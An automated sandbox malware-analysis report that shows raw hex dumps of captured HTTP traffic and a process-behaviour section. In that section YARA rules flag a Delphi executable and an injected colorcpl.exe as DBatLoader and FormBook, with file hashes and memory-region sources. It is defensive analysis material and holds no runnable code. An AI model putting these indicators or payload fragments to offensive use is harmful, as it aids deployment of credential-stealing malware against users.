                                                                                              2022-11-29 17:24:02 UTC35INData Raw: f6 73 c6 89 bf 45 0d dd 89 60 c9 b9 6d 8d a8 ef 78 07 f3 fe 71 4c 3a a3 ab ce 0d fb 83 b2 c6 82 7c f4 60 b4 f7 16 82 c5 e6 80 c3 3e 80 42 05 9f 9b 20 78 82 8f 0d 54 4e 3a 0c 48 79 53 7e 2d 6c c9 2f 63 26 b6 47 7c e6 09 9d 14 f9 f8 43 c4 74 6d 23 99 a1 a0 22 16 98 af 3b a6 fd 70 73 d8 a0 e8 18 08 61 42 3b 54 fa be f2 35 09 4f 9c ff a0 e6 29 3c 9b 2f 8c 17 28 1f 4a dc 97 53 9e 2c 01 b9 22 fb a7 f4 50 2d b1 82 4c 65 b9 0d 07 88 7d 82 77 97 65 e6 9b b2 11 55 f9 8d 90 45 ec bc 5f ad 46 b9 68 9d da ce 92 12 91 ff 5a 5d ab 41 39 c6 a3 06 9b 0a a2 19 2a 94 b7 2e 5b 0c 86 8c 31 00 56 b0 43 7d 1e 71 03 b0 a3 c6 98 0c 2e d6 80 45 6a 83 0f 53 ae 13 d3 a9 a6 13 13 14 8b 9d 5a 60 b9 55 75 9a 0a bb 1a 78 74 31 49 23 ca 6a bc 62 56 2a db 9d ef 7a ef 20 9d 6d 32 32 29 fb
                                                                                              Data Ascii: sE`mxqL:|`>B xTN:HyS~-l/c&G|Ctm#";psaB;T5O)</(JS,"P-Le}weUE_FhZ]A9*.[1VC}q.EjSZ`Uuxt1I#jbV*z m22)
                                                                                              2022-11-29 17:24:02 UTC43INData Raw: ca a7 31 2d 95 f6 e4 65 3e a1 69 ea 4c 6f f1 2a ae 7f eb 9a fe 4f 11 c0 ae 62 5d a7 f3 36 9a d9 6f e0 c2 fb 21 10 78 2e b5 38 a6 fb 0f bd 61 43 96 10 5d b3 6a d2 ea be 2e 74 b2 b0 4a 0e c2 8a f3 a6 c3 9d 63 56 66 cc 0c 57 f9 88 72 49 72 e2 50 eb 1c f4 58 6c 1f 26 d3 06 5c 55 d9 c7 ea 3f 8b 6d e8 d9 87 c1 47 92 8b 69 a9 83 99 f7 43 90 a8 0c 49 bc 53 8f 7b 9e 41 a5 25 a6 e5 f3 f2 1a f6 78 cd cd ca f6 0e 26 6f b1 74 60 29 2d 67 ab ac fb 09 91 af 6f bb f2 cb f2 42 1a 1c 2c 9b 03 35 7e cc c5 99 37 98 f5 16 18 47 c2 b1 2b e3 f8 b2 ff 98 c5 6b 36 52 45 42 0e cb ff 57 90 fe 0b bc a3 ec 02 ba 9b f6 58 ad 0b 15 75 02 e5 85 c9 15 3c 8b 8a 84 e5 dc ed 7a c1 61 9d e6 6f bc 9d bf 0d d3 bc 97 f1 29 35 f7 37 6e 5c ed 8f b4 f4 34 93 52 f8 9b 6c 65 ed 7b fd 4b de f4 6d 4f
                                                                                              Data Ascii: 1-e>iLo*Ob]6o!x.8aC]j.tJcVfWrIrPXl&\U?mGiCIS{A%x&ot`)-goB,5~7G+k6REBWXu<zao)57n\4Rle{KmO
                                                                                              2022-11-29 17:24:02 UTC51INData Raw: a5 bb 8f 1b 91 2e 2c 5e ca 5e 92 c4 9d c4 89 82 50 10 8d 5b a6 ef f0 d5 b1 1f 5f f2 3c c6 15 aa 2e b0 3e 77 26 97 bf b0 29 a7 6b a7 c1 1a 2f 57 cc 2e b6 b5 dd 3f 1d 48 63 6c a5 30 94 30 d3 c3 be 27 aa 3a 11 ab 4c 91 d6 65 ba 53 dc c4 20 d4 8c a8 7a 2c 99 ae 95 b6 c8 16 4c fc d8 51 12 02 d0 77 26 65 8a c0 94 73 1c 35 8f 50 cd 4d 16 da 43 33 b2 36 25 a7 15 ad 59 57 4c 3d e1 5c fb 5f 39 26 1d 21 c7 1f d6 e5 57 47 d2 94 75 a3 32 0f b4 0a ad 8e b0 55 d9 c5 cd f3 d8 bc 7b ad 67 b0 ac 2e 30 2d 40 a0 36 4e 81 59 f0 aa b4 a5 22 52 e4 9e 59 22 2e 0f c0 fe 30 2c 49 50 af be c3 18 d0 a5 68 53 56 2e db 5c 27 4c ce 7c 31 8e 36 26 d5 28 9f 39 8b 9d ae da a1 7b 31 61 5a 85 59 6e 0a 59 79 27 ee 37 04 03 c0 4d 9d 97 b8 cf 52 c3 4c 54 6b d4 52 df 2b 22 4f 7a 6b 6a 96 1c d3
                                                                                              Data Ascii: .,^^P[_<.>w&)k/W.?Hcl00':LeS z,LQw&es5PMC36%YWL=\_9&!WGu2U{g.0-@6NY"RY".0,IPhSV.\'L|16&(9{1aZYnYy'7MRLTkR+"Ozkj
                                                                                              2022-11-29 17:24:02 UTC59INData Raw: 05 92 09 9a 50 c6 ff 38 99 5a d7 b0 d7 3f c6 56 05 ee 16 58 36 ce dc 39 3f 09 c8 b0 51 13 46 16 0f 0c a8 03 52 79 25 94 e9 57 6b 97 7c dc 4a 07 bd e2 91 d6 07 dc bf 8e c1 93 13 36 16 be 94 e5 cc 60 fd 55 cb 19 5e 0f a3 d4 96 57 c3 8c 97 a1 01 bb a9 1b b4 29 31 da bf 41 c6 6e 55 23 62 96 92 44 98 11 39 7f 40 9e 03 c2 cb 4b 17 56 c5 67 19 ff 4a c1 bd b5 a0 bb 62 c0 58 da 47 c7 05 36 93 dc 4c 1d e4 97 1f de c0 76 bd 21 11 b3 ce 3a 20 50 a4 c1 18 99 47 d6 c3 8e ba 91 3e 2e c4 a2 b1 57 bf 1a 4f 4a 19 c5 2d 95 3b dc c7 0f bc 46 2a 43 d7 2c ba 23 4b dc bf b4 55 e9 da 31 b3 1d a4 9c ae 5a 3e 6c 84 1b 13 2f 55 1b d1 67 19 61 8d b3 0f b2 a0 01 25 58 fe 4e e2 55 3e 9c b0 11 0b 80 0d 56 2a 47 56 86 b1 d6 56 36 cc 4c 50 5a cc e9 b0 2b c3 08 21 25 c7 4d 43 cb 53 55 c3
                                                                                              Data Ascii: P8Z?VX69?QFRy%Wk|J6`U^W)1AnU#bD9@KVgJbXG6Lv!: PG>.WOJ-;F*C,#KU1Z>l/Uga%XNU>V*GVV6LPZ+!%MCSU
                                                                                              2022-11-29 17:24:02 UTC67INData Raw: 21 d0 54 d9 bb 09 72 b0 b4 46 50 60 9b b1 fe ac 46 05 28 13 29 31 53 d8 64 4b da 80 4d a6 68 8f 2d 84 f1 14 15 7d bf d7 31 64 d9 4c 38 0b 9a f3 bf 35 b0 b2 ca 2d 37 e6 57 d1 43 cc 33 4d d2 33 b4 4d 64 46 5a 02 e9 be ba d3 c7 d1 93 61 fa 1f d3 86 1e 01 21 39 3f ce 46 e4 4f 70 de 2d 34 3e 3e 07 a2 68 bf 25 a6 c0 41 2d cf d0 51 ac b6 c8 3d 1d b8 27 47 c0 a8 34 e2 b4 c8 41 c0 49 4b 21 23 d0 c5 cf 5e dd df aa aa 46 46 c9 8f f4 0c 35 c7 05 a7 05 a6 1f 3b dc d7 59 ca e5 d2 21 9d e7 7c 27 9d f0 ad 07 92 74 52 c2 ae bc 55 1f cf 43 d8 37 c4 1f 4b a6 c2 b9 57 b8 43 da 2f 4d 3d 1d 21 53 4a c7 ba 28 68 2b b6 5c 60 52 30 b1 12 a8 4c a0 a1 88 39 2f c6 55 5c e4 45 f1 4b 27 f2 23 2f 72 40 8b d3 9a 10 ac 82 f2 45 d9 34 09 a2 66 4e b6 b4 29 4f c4 1b 42 d2 c5 57 c6 ba d0 4d
                                                                                              Data Ascii: !TrFP`F()1SdKMh-}1dL85-7WC3M3MdFZa!9?FOp-4>>h%A-Q='G4AIK!#^FF5;Y!|'tRUC7KWC/M=!SJ(h+\`R0L9/U\EK'#/r@E4fN)OBWM
                                                                                              2022-11-29 17:24:02 UTC75INData Raw: d7 17 46 5c e4 66 74 1b 46 d9 5c b7 9b e0 02 29 c1 60 46 d9 85 81 c5 cf a6 f8 41 d4 52 bb 93 8b e7 c9 4a d7 50 2b 8b 3d ab c2 c4 d5 cf 39 02 47 d2 c7 4a 64 5e 57 2a e2 b9 64 62 bf cf 75 44 59 05 4a 8a d7 0c 23 55 38 62 bf c2 7b 6f 45 f7 3f c6 c1 54 24 85 82 1d 8e 93 4f 0e b6 5e d1 d5 46 08 fa c0 13 4c c1 ba 10 79 ce 5e d1 2e 2c 74 c2 43 36 cc 4c 50 5a 5a d2 44 48 52 18 f2 e5 a6 54 bf 62 c7 02 87 b6 f6 43 00 c2 cf c5 e0 10 e3 b0 79 d0 02 bb d3 26 27 f1 be 5e 52 60 c7 14 fa bd d3 49 7e 78 6c 55 4d 1d b2 6f ca 0a cf d3 39 0c 79 79 c7 03 4a c7 da b5 68 2b 06 c8 fe 46 46 a3 c9 72 1d 84 bf 33 44 53 77 2b 64 50 b8 14 73 d0 bd c1 de ed 82 a6 fa 51 44 bb bb 1e 23 e1 27 be fa d7 a8 fa c7 e6 57 d5 cf de 5c e9 21 fa de 02 33 4a ff 8b 36 e0 c7 c0 de 34 c2 4a 5c 99 28
                                                                                              Data Ascii: F\ftF\)`FARJP+=9GJd^W*dbuDYJ#U8b{oE?T$O^FLy^.,tC6LPZZDHRTbCy&'^R`I~xlUMo9yyJh+FFr3DSw+dPsQD#'W\!3J64J\(
                                                                                              2022-11-29 17:24:02 UTC83INData Raw: 09 a0 c7 cb 53 c5 3a c8 c9 62 4b c1 c7 29 4b 6e 1f 1f bb 98 4e 31 4e 29 ca cb c9 ce 00 29 1a cc 33 4d d2 31 43 ac 9a 47 18 fd 52 9d 65 05 6c dc a2 9a 56 c3 e2 cb f0 59 c1 54 62 bf aa 2c 76 a6 b8 64 96 c5 d8 60 c2 53 bd c0 d8 08 c4 8f da ac b6 47 b8 55 bc 94 45 2c 90 d5 2e ab 05 f7 4d 15 9c cb 5c c8 c9 36 d4 cb d7 c8 c7 bd 1b 79 6e aa a6 c5 13 cb 53 cd 46 55 c9 d7 2d 75 1b 2c ca 31 57 c6 54 4d ac 90 4f 9f 09 60 9b 2b aa cd 53 d0 54 51 dc bb 45 4f b9 1c 5a e3 47 6c 4f b2 cd c5 4a 0c 28 b7 de e6 9c a2 11 50 c5 60 f2 4d cd bb 46 5c a8 58 74 1b 21 5e 05 c7 3f cd 29 41 bc 1c 4b 29 c9 4d 54 d9 53 2d 01 d4 aa 72 47 23 3c 36 34 09 a2 8c c9 62 d2 d3 69 e4 62 50 c3 c1 98 29 72 33 35 c1 ff bb 4d 60 5a da 50 cd ac 0c ac 24 da 2f cf 51 c0 ff 4b b2 4a dc 4f 70 de 2d 34
                                                                                              Data Ascii: S:bK)KnN1N))3M1CGRelVYTb,vd`SGUE,.M\6ynSFU-u,1WTMO`+STQEOZGlOJ(P`MF\Xt!^?)AK)MTS-rG#<64bibP)r35M`ZP$/QKJOp-4
                                                                                              2022-11-29 17:24:02 UTC91INData Raw: 18 f7 91 19 09 42 49 6e 52 39 29 50 4f 73 39 ed 3b 85 c3 c1 bb 44 c6 29 6b 45 a6 40 c8 d9 d7 64 17 ed 1f 1b d1 48 60 4f 71 fe 54 c9 d1 2d 11 48 95 45 cf d3 fb cd 6c 64 52 d1 d2 cc ce 13 5c a2 dc 70 96 49 ac 39 b9 8d c1 4c bd 4b fa 83 d3 5c 5e 46 13 d5 62 c1 eb 3d c0 ef a4 22 c7 bd c7 f3 ca b8 eb ff 97 d7 c7 5c e3 d8 be f3 98 26 cf c5 c3 6e 3f c2 82 9a a1 46 5e c3 cb 55 b2 f7 01 26 c7 4a 5c 64 57 b2 c9 96 91 c9 62 48 52 d4 23 58 19 24 c7 c1 c3 b2 43 1f 6c 16 2d af 49 52 32 5c 60 39 8c 84 7c 43 29 29 46 88 5c 9e 20 dc f4 93 13 c2 65 c8 bd c1 ba 59 82 e1 53 d2 aa ae 46 a4 bf 98 ee 5e 12 66 9c 5c c3 b0 fc ed db 59 cc b4 23 c7 13 64 fd 52 db c5 e7 86 d7 d3 b8 0c df 6e c8 d2 b6 2f d9 01 54 98 85 c0 61 21 01 4c cf ac b7 e9 7c 45 c8 37 b2 c7 a0 46 11 4c 48 90 bd
                                                                                              Data Ascii: BInR9)POs9;D)kE@dH`OqT-HEldR\pI9LK\^Fb="\&n?F^U&J\dWbHR#X$Cl-IR2\`9|C))F\ eYSF^f\Y#dRn/Ta!L|E7FLH
                                                                                              2022-11-29 17:24:02 UTC99INData Raw: 2e 96 ea c6 bf 4d d2 b3 9c ef 4d b2 5e c3 c1 5e 38 8e 17 1d 3c 3b d1 48 e6 0a f1 60 54 bb 5a 49 41 1d 65 bd 2d bf 4b d0 54 d9 04 33 72 b0 c1 46 4a 58 4d 55 60 46 12 19 6c 1b 48 36 3f 49 a8 83 d3 5c 56 54 81 dc 62 c1 f6 8e dd b8 2b 10 21 7d 25 46 46 c7 bb 3f 43 d5 c7 45 87 b0 40 d6 5e d5 0c 10 db a6 12 53 0c 64 64 6d d1 db a8 31 d7 8a c7 d5 bd 46 79 d4 d3 d7 6f ad 6c 23 35 4a c3 c5 05 47 73 cd 96 c1 54 cb c3 73 43 c7 c1 46 d4 d8 ae d1 4b ba 9d 55 54 4a 4c 83 ca b4 ac 4b 24 74 d0 3f 78 49 4d f1 51 ce 3a 3b 55 42 53 d2 3c da 49 36 4b c6 65 43 c8 b9 57 53 f2 3b 51 d5 cf c5 c1 ec 4f af 4a 27 64 94 81 57 b9 d9 9e d3 11 08 53 40 5c 90 d3 17 10 d4 3a c9 8e bf 98 77 d2 42 cf c2 c7 21 7f 45 af b2 ab ce 3a 91 50 5c fa 28 78 1f bb d1 c7 53 9f 08 08 33 70 53 77 aa fd
                                                                                              Data Ascii: .MM^^8<;H`TZIAe-KT3rFJXMU`FlH6?I\VTb+!}%FF?CE@^Sddm1Fyol#5JGsTsCFKUTJLK$t?xIMQ:;UBS<I6KeCWS;QOJ'dWS@\:wB!E:P\(xS3pSw
                                                                                              2022-11-29 17:24:02 UTC107INData Raw: ce 89 43 dc 7f 49 c8 14 c8 d2 7b 43 d6 60 44 55 63 1b 27 87 b8 0a b0 8a c3 a0 b9 2c 52 cf 69 04 e9 06 e4 e4 77 c8 4f 13 49 c8 3b 49 d8 ce 41 45 53 4a 5e d1 97 3b 43 60 d7 4c 07 d2 ca 5a cf 4c 01 ce c8 bb bb 48 fd ca 45 d7 52 d1 4e 0b c8 f4 c2 37 5a 50 4e 86 7f 44 c2 fd 60 17 65 22 21 f0 de 5e 52 36 6e 72 b8 aa 40 43 79 1d 0d c5 fb 4a c3 5f c9 74 2b c2 f3 27 12 1f 96 56 13 b2 07 7c e4 53 86 6a d4 49 b9 c8 3b b9 d8 ce b1 45 53 3a 47 53 64 8e 67 49 ea a4 86 0b 0b b6 b7 4d af 8a 8c 05 19 ec 4b b1 cb 43 3f bb 57 53 96 4c d2 da 80 59 cc 72 4f c8 dd d0 4b dd d2 cc c1 dd 43 e8 11 13 15 ff 74 51 5d 9c 15 a0 0b f5 ce b7 22 de 57 bc e6 e2 40 5b c9 64 5f 82 72 23 1b 46 50 64 8c d2 dc 08 4a 5f 45 52 9a d0 46 d9 ec 33 eb 39 a6 11 bb 8c 5a 36 cc c1 c5 5d 97 e9 c7 d5 53
                                                                                              Data Ascii: CI{C`DUc',RiwOI;IAESJ^;C`LZLHERN7ZPND`e"!^R6nr@CyJ_t+'V|SjI;ES:GSdgIMKC?WSLYrOKCtQ]"W@[d_r#FPdJ_ERF39Z6]S
                                                                                              2022-11-29 17:24:02 UTC115INData Raw: 54 c9 e2 bf 63 f7 d3 4c cf d0 d3 47 cc 29 96 61 c0 ef d7 c1 32 5c d3 60 b9 7f 47 6c c9 4a 4c c1 bb 7c 4b 2b 8a 5c 64 4c 5f 4b 4b 2f 92 b1 c0 37 62 07 c6 b0 bf 29 47 21 c3 55 43 eb c6 c2 b7 8a 9e cf 5e d5 58 e8 13 4c 46 52 a6 51 29 33 46 d2 0c f4 de 5e 52 60 28 e5 5c bd d3 5c d9 60 57 ec dc b7 4e 50 df 6f f7 39 c7 c1 e2 f9 14 fc 1d c7 c1 57 ff e2 77 60 01 4e 90 55 9f 94 b6 d9 3f 64 d1 4a 2d f3 64 50 4c 56 62 c1 d6 f4 3b 69 5a c1 76 ed df 1f 46 bd 51 e9 44 7b 25 5c c3 45 a4 fc 00 d1 8e bd fd d0 2e 01 33 4c 55 41 ef c3 c1 d9 5c d3 c7 ce ea d4 f4 bd d3 66 46 78 23 c9 62 51 6e c6 00 1d cf d3 d6 0c 81 79 bb 03 52 01 d0 28 86 d3 bb 4d fc e7 ac 5c 54 dc 6c 0a 08 be 5c bf ca 44 da 0e bc 8c 5a 07 d4 c2 fb ac 52 c8 b3 0b a2 96 3c d4 2b 3e 3b 62 52 50 7c 84 a6 cd ff
                                                                                              Data Ascii: TcLG)a2\`GlJL|K+\dL_KK/7b)G!UC^XLFRQ)3F^R`(\\`WNPo9Ww`NU?dJ-dPLVb;iZvFQD{%\E.3LUA\fFx#bQnyR(M\Tl\DZR<+>;bRP|
                                                                                              2022-11-29 17:24:02 UTC123INData Raw: 37 55 ab c6 31 72 49 d1 5e d1 13 10 47 60 23 45 7c 27 47 d1 2b d0 d3 5c 5a c4 65 d9 0d ce 3e 28 cc a7 55 36 32 d4 3c b0 49 a0 bf c9 4a 5e e8 5f ca ac df d6 2c dc bb 59 ca 4c 46 52 01 4f 4b 13 5e c3 c1 56 38 eb 4b dc f5 bf 2b 1f 29 d6 29 51 4f c9 62 bf 6e e4 e6 4c cf d3 40 f5 e0 63 c7 58 46 c7 ed da 36 68 3f fa 7c da 47 74 e0 45 a6 e9 e2 79 63 16 69 8a ef 41 b0 90 92 3a 18 eb 50 b8 62 1b c6 c5 c6 5e da d4 ed 54 1d cf 25 55 bb 55 cf 3b 4f e7 5a b2 bb 1b d2 bf 43 50 d0 47 74 4e a6 d1 35 da bf dc db d6 55 1a 1e 60 f5 93 45 f9 d7 33 de 41 39 1d eb 2d 44 c9 3d c2 8c e6 95 db 4d 47 80 d1 8f cc 51 21 1f 80 aa 0c 4f 92 5a 07 a9 c7 da 50 d0 41 76 60 56 e4 d2 9d a8 de 2b f1 4b d4 bf 53 49 c1 90 c6 b7 22 c6 32 cc 5f ca 1f 7a e4 b8 d9 57 81 38 32 43 67 d0 49 fb c3 c1
                                                                                              Data Ascii: 7U1rI^G`#E|'G+\Ze>(U62<IJ^_,YLFROK^V8K+))QObnL@cXF6h?|GtEyciA:Pb^T%UU;OZCPGtN5U`E3A9-D=MGQ!OZPAv`V+KSI"2_zW82CgI
                                                                                              2022-11-29 17:24:02 UTC131INData Raw: 3f ba ad c8 46 5e 20 99 eb 2b 5c b9 3d d5 62 f4 a8 e9 a8 07 03 9a 96 c5 96 ac 2c 3b ce c9 4a d7 ca 57 be 63 c8 1f 69 e4 cf 52 9d b0 e3 b0 52 67 55 46 5e e6 4b f1 ba 86 96 8e 96 c5 05 aa 8b 41 d8 60 54 c9 06 d4 33 b5 4d bc e6 e2 c7 46 28 99 df 2d 52 3c c8 46 50 b9 fb 84 2d a0 17 ff 0d 52 15 a8 2c 31 55 bf d3 5c e9 3b 31 f0 51 31 3a c8 c5 58 22 f6 df aa bf af 3f bd bf ec 43 ef aa 07 9a ff 9a d3 ff 37 97 43 ca c1 bb c7 cb 4f 29 ab 4d 33 36 e0 d7 64 a1 e6 df 1d 64 3a e2 d7 d9 ad f4 e1 2f 0b 0f 13 ff 54 8e c4 9f 57 3d d9 c7 5a d3 43 bc 46 b8 51 e2 58 6b 3f 5e 55 4c 94 45 c1 c1 b0 eb e7 6a 24 64 11 b4 b8 be e5 d4 27 06 cd b2 6f b3 0b 6c 47 b2 bd bf c9 bd 38 a2 28 d8 5c 3c d1 8f c6 55 2a 9e c1 5e c7 4a 60 fb d0 57 46 70 5e b3 d3 c7 d9 0a 44 a1 c1 b6 d6 b2 0b b9
                                                                                              Data Ascii: ?F^ +\=b,;JWciRRgUF^KA`T3MF(-R<FP-R,1U\;1Q1:X"?C7CO)M36dd:/TW=ZCFQXk?^ULEj$d'olG8(\<U*^J`WFp^D
                                                                                              2022-11-29 17:24:02 UTC139INData Raw: 7a 1d b0 a6 50 5a 5c d9 cc 7d c7 46 46 24 3a c9 4a d7 c1 ec 1b d1 4e 5a 21 7a cf 52 0b dd e3 c7 4a 64 cf be 3d ab 2d 88 cb 0d c6 1b 8c af 57 c5 f2 de d9 60 7c 00 7a a8 46 b9 57 4c cf db 4b e9 b0 97 96 2b bf 52 bf 5e 06 fa 5e d1 d5 3d e9 5c c3 15 d8 e9 46 d9 5c bb 1b 47 ec c4 15 d1 9c d0 33 92 3e e4 62 36 ce bd c7 7e f9 e5 a8 c1 ab de c7 5c eb d6 db 2b 9a 8c 2d 50 4e bf d3 44 0c 55 ed 46 d9 9c ef f1 d7 d3 c7 64 2f 59 f4 31 8a cb 0f 51 35 8a 69 d4 46 b9 57 4c cf 6c 46 e9 23 d1 3c 4b 4a c7 f9 61 68 b8 9a 05 37 bb bb 5a 5c 49 0a 69 e7 d9 cb a0 68 84 64 50 4c d7 aa e2 b5 2d 9c d3 a4 d0 be 8e 40 45 4e 3a c6 c9 4a 68 5b 84 b4 64 40 d6 5e d5 e7 db db 1d 09 96 1b d9 d9 48 46 7f 81 67 09 78 c6 31 a2 4e 5f cc d3 d7 f1 ae 6c ac 62 bf 52 77 5f 3b b8 d9 40 c8 54 5e 98
                                                                                              Data Ascii: zPZ\}FF$:JNZ!zRJd=-W`|zFWLK+R^^=\F\G3>b6~\+-PNDUFd/Y1Q5iFWLlF#<KJah7Z\IihdPL-@EN:Jh[d@^HFgx1N_lbRw_;@T^
                                                                                              2022-11-29 17:24:02 UTC155INData Raw: 4e d9 f7 cc 40 26 1c 66 d4 4e 4c c1 df d8 af f0 02 2e f7 48 5e bf e5 4b 3a e3 fe f0 4c c5 d3 64 df d8 af 35 be 1b 31 cf bf cf 3e 45 36 35 0b ce 8a bb bb 54 b1 49 42 0b 82 39 7d 4a 5e 54 67 3b 42 55 69 b7 3b 4c 50 c7 61 d2 af c4 7d 0c 6f 48 4a d1 65 dc af ad d5 79 f9 5a d3 bd 40 c6 ab 7f 23 6a 2f d9 d9 5e b7 c8 b9 cd cd fb 67 60 52 62 b1 ce 5d 93 9f 2c 5b 54 d7 d7 71 3b e6 10 33 b8 80 4c c9 c1 fa 59 40 98 9a 77 a5 d1 5e 54 44 45 3c 5e 39 f5 17 4c bb c1 83 d4 5d 30 8d 8d a7 60 d7 d9 14 d2 ad 2c b1 82 29 48 52 5e 85 ce b7 c4 49 9f aa d1 4e 54 12 e4 e6 5e 21 50 5a 4c 46 cf 81 4f ec fd 2f 92 ca 64 62 bb 3b d6 af ac 1b 8a 0a 62 64 48 cc ca ea 8d a1 d3 3b c1 5a bb 43 d2 3a 56 47 e4 3b 52 4c 5e d0 57 5d 5c 60 46 46 d1 c9 62 28 d2 3c c1 d8 21 63 d1 d9 58 03 d6 ea
                                                                                              Data Ascii: N@&fNL.H^K:Ld51>E65TIB9}J^Tg;BUi;LPa}oHJeyZ@#j/^g`Rb],[Tq;3LY@w^TDE<^9L]0`,)HR^INT^!PZLFO/db;bdH;ZC:VG;RL^W]\`FFb(<!cX


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:18:23:55
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              Imagebase:0x400000
                                                                                              File size:750592 bytes
                                                                                              MD5 hash:EDB1382C354EC6C09C53473E5335703A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.308860487.0000000003BAE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.308375056.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:18:24:02
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\colorcpl.exe
                                                                                              Imagebase:0x1140000
                                                                                              File size:86528 bytes
                                                                                              MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
